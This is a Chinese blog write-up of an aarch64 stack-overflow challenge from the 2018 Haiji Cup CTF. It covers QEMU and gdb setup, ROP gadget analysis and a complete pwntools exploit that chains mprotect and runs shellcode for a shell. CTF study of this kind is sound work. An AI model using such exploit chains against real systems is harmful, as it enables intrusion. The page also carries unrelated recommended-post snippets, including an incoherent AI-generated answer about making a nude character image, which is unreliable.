2018-骇极杯

最新推荐文章于 2021-08-31 08:10:47 发布
原创 最新推荐文章于 2021-08-31 08:10:47 发布 · 562 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#arm #pwn

部署运行你感兴趣的模型镜像

arm

第一次做arm,花了很多时间,希望整理的详细一点。

环境安装

首先需要安装qemu,和相应的依赖库
qemu

sudo apt-get install qemu

依赖库

sudo apt-get install -y gcc-aarch64-linux-gun g++-aarch64-linux-gnu

合在一起安装不了的话就分开来安装

运行

qemu-aarch64 -g 1234 -L /usr/aarch64-linux-gnu ./pwn

-g 1234:给gdb预留的调试端口1234
-L dir :指向BIOS和VGA BIOS所在目录(一般我们使用”-L .”)

调试

^^^
可以挂到socat上,非常方便

socat tcp-l:10002,fork exec:"qemu-aarch64 -g 1234 -L /usr/aarch64-linux-gnu ./pwn",reuseaddr

^^^
要用gdb远程调试
在这里插入图片描述
需要安装一下gdb-multiarch

题目分析

  1. 检查保护
@ubuntu:~/Documents/comp/haiji/arm$ checksec pwn
[*] '/home/hu/Documents/comp/haiji/arm/pwn'
    Arch:     aarch64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

并没有什么保护,就是一个简单的栈溢出。
2. 查看主函数
在这里插入图片描述

读两次
第一次先在bss里面存放shellcode
第二次利用rop执行mprotect,使bss有执行权限
3. 找到合适的gadget(用gdb里面rop指令,更全一点)

0x00000000004008cc : ldp x19, x20, [sp, #0x10] ; ldp x21, x22, [sp, #0x20] ; 
ldp x23, x24, [sp, #0x30] ; ldp x29, x30, [sp], #0x40 ; ret
##将栈上面的值载入到
0x00000000004008ac : ldr x3, [x21, x19, lsl #3] ; mov x2, x22 ; mov x1, x23 ;
 mov w0, w24 ; add x19, x19, #1 ; blr x3

对arm的栈帧结构研究了一下,这里主要说说它与x64的不同:
在arm中,
1.没有没有$rbp寄存器
2.函数的返回值放在$x30中,bl就等价与x64的call,只不过是它将bl下一条指令放在了$x30中,当遇见ret指令时,将$x30中的值赋给PC。
exp

from pwn import *
context.log_level='debug'
context.binary='./pwn'
p = remote('127.0.0.1',10002)

'''
0x00000000004008cc : ldp x19, x20, [sp, #0x10] ; ldp x21, x22, [sp, #0x20] ; 
ldp x23, x24, [sp, #0x30] ; ldp x29, x30, [sp], #0x40 ; ret
0x00000000004008ac : ldr x3, [x21, x19, lsl #3] ; mov x2, x22 ; mov x1, x23 ;
 mov w0, w24 ; add x19, x19, #1 ; blr x3
'''
bss=0x0411068
p.recvuntil('Name:')
payload=p64(0x4007e0)+p64(0)+asm(shellcraft.aarch64.sh()) #坑点2
#这里为什么要用0x4007e0,而不是0x400600,在后面揭晓
'''
.plt:0000000000400600 .mprotect
.plt:0000000000400600 ADRP            X16, #off_411030@PAGE
.plt:0000000000400604 LDR             X17, [X16,#off_411030@PAGEOFF]
.plt:0000000000400608 ADD             X16, X16, #off_411030@PAGEOFF
.plt:000000000040060C BR              X17     ; mpr
'''
p.sendline(payload)
payload='a'*(0x40+8)
payload+=p64(0x4008cc)
payload+=p64(0)+p64(0x4008ac)# ldp x29, x30, [sp], #0x40   #坑点1
#将0x4008ac写入$x30,当ret时,返回到0x4008ac
payload+=p64(0)+p64(0)#ldp x19, x20, [sp, #0x10]
payload+=p64(bss)+p64(7)#ldp x21, x22, [sp, #0x20]    
#ldr x3, [x21, x19, lsl #3],因为需要寻址一次,所以必须将mprotect的地址放在bss里面
payload+=p64(0x1000)+p64(0x411000)#ldp x23, x24, [sp, #0x30]
payload+=p64(0)+p64(bss+0x10)#坑点3
p.send(payload)
p.interactive()

这里要着重说一说坑点2、3,想了很久才想明白。

执行到 blr x3,将blr x3下一条指令存入$x30(反正就是回不来了>.<),所以我们在这就需要从新控制$x30,也就是到执行完mprotect后,需要继续执行bss+0x10的shellcode。
在这里插入图片描述
利用LDP X29, X30, [SP],#0x10这条指令
在这里插入图片描述
所以最后payload+=p64(0)+p64(bss+0x10)就使得执行完mprotect后程序转到shell code上了

https://xz.aliyun.com/t/3154#toc-7
https://cloud.tencent.com/developer/article/1376383

您可能感兴趣的与本文相关的镜像

Stable-Diffusion-3.5

Stable-Diffusion-3.5

图片生成
Stable-Diffusion

Stable Diffusion 3.5 (SD 3.5) 是由 Stability AI 推出的新一代文本到图像生成模型,相比 3.0 版本,它提升了图像质量、运行速度和硬件效率

CTF wp 2018”全国大学生网络安全邀请赛暨第四届上海市大学生网络安全大赛线上赛 writeup
Thea_1207的博客
11-05 3992
为0x00 签到题操作内容: | 登陆比赛界面上去看到签到题,一般情况下签到题是没有难度的题目给定一串字符MZWGCZ33GM2TEMRSMQZTALJUGM4WKLJUMFTGELJZGFTDILLBMJSWEYZXGNTGKMBVMN6Q Base32 一闪而过,比的就是手速,解码拿到flag。 FLAG 值: 标志{35222d30-439e-4afb-91F4-abebc73fe0...
vue功能-键盘
一入前端深似海
07-04 4375
继上篇数字键盘以后,这篇文章写一下键盘用法,同猿们拿好小本本! 1.封装的键盘组件 <template> <div class="vitualKeyboard"> <div class="search" :style="{top:topPx,right:rightPx}"> <input name="inputArea" ...
2018[cyvm]
九层台
11-28 516
ida加载 一个switch case。套用大佬的一句话“while循环套switch,不是迷宫就是vm” 这里是vm,第一次做vm的题目。简单说一下vm是什么。 vm其实就是自己定义了一下程序的机器码,比如这里用0x01来表示mov这两个参数,然后用数组来模拟寄存器,栈。在这个题里面vm的数据段和代码放到了一起。 简单跟了一下 ennnn有点不太好懂,贴出官方的步骤 最后一位是原来的值,...
-Web
wyj_1216 House
11-10 1141
”全国大学生网络安全邀请赛WriteUp web1 首先,burpsuite抓一波流量 将GET改为POST,并且post admin=1 访问robots.txt 发现有source.php和flag.php 访问flag.php无果,所以只能去看source.php 这里看到需要伪造ip 在头中伪造ip只有几种情况:xff xci clientip remoteaddr ...
_2018_momo_server(条件竞争UAF)
seaaseesa的博客
09-14 1065
_2018_momo_server(条件竞争UAF) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 Count功能开启了一个线程 该线程会异步进行堆的free操作,其中注意到free(ptr[i]->name)后,没有将name指针清零,并且该循环尾部会休眠1s。 结尾会将ptr指针清零 在add函数中,如果name已存在,那么仅更新count和flag。 因此,我们在ptr[i]被清零之前,通过add更新count和flag,这样,name就会被二
2018年“” web3 GOOD JOB writeup 两种解法
a3320315的博客
10-17 839
0x01 贴出源码 <?php //error_reporting(0); //$dir=md5("icq" . $_SERVER['REMOTE_ADDR']); $dir=md5("icq"); $sandbox = '/var/sandbox/' . $dir; @mkdir($sandbox); @chdir($sandbox); ...
2018.11.4 东华) REVERSE What's it wp
uiop_uiop_uiop的博客
11-06 487
What 打开先要求输入luck string,拖进ida看,输入的必须是长度为6的英文小写。之后对输入的数据取md5,然后遍历生成的MD5串,统计其中0的个数v15和下标总和v14,当满足10*v15+v14 == 403的时候为有效输入。这个题目的亮点在于打开decode函数的时候,有这么一个提示 然后结合着汇编看c代码,然偶看到了check,找check函数,发现 看出来这里是...
2018上海CTF“”逆向WP
11-12
2018上海CTF“”逆向WP2018上海CTF“”逆向WP
CTF训练计划—[SUCTF 2018]GetShell
Lemon's blog
08-19 4760
前言: 这道题考察的是构造无字母数字的webshell,也挺有趣,被卡了一天了,还有看了网上的WP,千篇一律,所以很有必要记录一下。 [SUCTF 2018]GetShell 直接给出源码 <?php if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data
Microsoft SQL Server 自定义函数整理大全
weixin_33834628的博客
07-22 2514
01、去除字符串中的html标记及标记中的内容【叶子函数分享一】去除字符串中的html标记及标记中的内容 --1、创建函数 createfunction[dbo].[clearhtml](@macovarchar(8000)) returnsvarchar(8000)asbegin declare@iint while1=1 b...
shanghai2018_baby_arm
06-03
arm64架构的pwn
buuoj Pwn writeup 181-185
yongbaoii的博客
06-09 512
181 182 183 184 185
buuoj Pwn writeup 246-250
yongbaoii的博客
08-31 356
246 pwnable_echo1 结构简单。 功能1 就是个输入输出。但是显然有个栈溢出。 功能2功能3没有。 啥保护没有,就栈溢出就完了。可以直接rop,它开了NX。也可以shellcode。 写shellcode会有两种,一种是布置在栈上,然后在bss上通过jmp esp跳过去,一种是写在bss上,然后直接跳过去,根据可输入大小来自行调节。 exp 247 actf_2019_actfnote 248 _2018_babyarm 249 metasequoia_2020_samsara
ARM PWN 环境搭建和测试
u012655643的博客
11-29 3619
ARM PWN 环境搭建和测试 最近一次比赛(“” 全国大学生信安邀请赛 )遇到了一道arm pwn的题目,题目不难,附上链接 baby_arm。我就想后面说不定也要做arm的题,就搭建一个环境吧。 手上刚好有个闲置的树莓派3b+,众所周知,树莓派是arm架构的,刚好拿来用。 树莓派装64位系统 都2018年了,怎么还在用32位系统呢? https://github.com/chainsx/...
http://www.hifakeoakleys.com 6666
coffen2015的博客
06-19 1440
The shoes seeming to be one with feet, Christian Louboutin shoes sale she could not control herself Compared wit...
ArmPwn学习
qq_40712959的博客
04-20 935
arm pwn练习 inctf2018_wARMup 程序逻辑 明显的栈溢出,但是只溢出了0x10个字节,很明显,需要栈迁移,但是在程序中,注意其调用read函数的汇编代码,如下,写如数据的缓冲区buf由R3寄存器重置,故若我们可以控制R3寄存器,则可以控制程序输入的位置,这里通过gadget(0x00010364 : pop {r3, pc})实现。 注意程序的endlog,如下图,可以发现,程序的SP由R11寄存器控制,而由于栈溢出漏洞的存在,我们可以控制R11,故我们可以通过控制R11,将其指向b
arm64 调试环境搭建及 ROP 实战
weixin_30478619的博客
11-08 585
前言 比赛的一个 arm 64 位的 pwn 题,通过这个题实践了 arm 64 下的 rop 以及调试环境搭建的方式。 题目文件 https://gitee.com/hac425/blog_data/tree/master/arm64 程序分析 首先看看程序开的保护措施,架构信息 hac425@ubuntu:~/workplace$ checksec pwn [*] '/home/hac425/...
2018上海CTF“” What’s_it
qq_41071646的博客
11-24 796
从这道题中学到了很多东西-------- 我当时和一个朋友抱怨 有没有有难度的题 而且还有wp的  因为 没有wp 做了好多天都没有结果 还没有答案是一件非常难受的事  本来这个题 我想用ida的idc 或者 python来解题的 但是 后来发现。。。。。 不会 很尴尬 还拿了书 结果 看是能看懂 但是根本就没有办法 怎么说 让问题简单化  用python 我百度了一下 发现还是要调用c语言...
给我生成一个爪裸装图片
最新发布
05-12
<think>好的,用户现在需要生成“爪裸装”图片,而不是仅仅搜索现有的图片。首先,我需要明确用户的具体需求是什么。他们可能是指某个游戏或动漫中的角色“爪”的裸装设计图,或者是希望根据文字描述生成这样的图像。 接下来,要考虑用户可能的背景。如果用户是游戏开发者或设计师,可能需要高质量的模型或设计参考;如果是普通爱好者,可能想通过生成工具自己创作。这时候需要区分不同的生成方法,比如使用AI工具还是专业软件。 用户的问题中提到“生成”,所以重点应放在如何创建这样的图片,而不是查找现有的资源。之前的对话已经提到了搜索方法,现在需要转向生成技术。需要考虑使用哪些工具,比如Stable Diffusion、DALL·E,或者3D建模软件如Blender。 另外,用户可能对版权问题不太清楚,特别是生成图片后的使用权限。需要提醒相关的法律风险,比如角色版权是否属于某游戏或动漫公司,避免侵权。 还要注意用户可能没有说出更深层的需求。例如,他们可能需要快速生成大量图片用于某个项目,或者希望个性化定制角色形象。这时候需要提供不同复杂度的解决方案,从简单的AI生成到专业的3D建模步骤。 在整理回答时,要按照用户的要求分点列出方法,避免使用步骤词汇,同时确保每个方法之间有换行。需要包含具体的工具名称和操作示例,比如给出Stable Diffusion的提示词,或者Blender的基本步骤代码。 最后,生成的相关问题需要基于当前回答内容,比如询问如何优化AI生成的图片质量,或者如何为爪设计其他风格的服装,这些都是用户可能进一步关心的问题。</think>关于“爪裸装图片生成”的解决方案: **AI图像生成工具** 使用Stable Diffusion、Midjourney或DALL·E 3等工具时,输入提示词需包含: ``` 角色特征:机械爪/赛博义体/未来装甲 风格参数:cyberpunk style, mechanical nude concept, 8k render 示例提示词:"cyborg female with exposed mechanical claws, biomechanical nude design, neon-lit cyberpunk atmosphere, intricate machinery details --v 5.2" ``` **3D建模流程** ```blender 1. 创建基础人体模型:Shift+A > Mesh > Human Meta-Rig 2. 添加机械组件:Ctrl+B 进入刀割模式切割机械结构 3. 材质节点配置: principled_bsdf = 0.5 metallic | 0.8 roughness add noise_texture (scale=50) to normal_map ``` **法律合规要点** - 角色版权溯源:通过reverse image search验证原创性 - 商业使用需满足CC BY-NC 4.0或更高协议 - 避免使用$\exists$ (存在)侵权元素的$\frac{相似度}{阈值} > 0.7$ **优化生成质量** $$ \text{质量系数} = \frac{\text{细节层级} \times \text{分辨率}}{\text{噪点指数}} $$ 建议设置参数:$\text{CFG scale}=7-9$, $\text{steps}=50-80$, $\text{Sampler}=DPM++ 2M Karras$
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值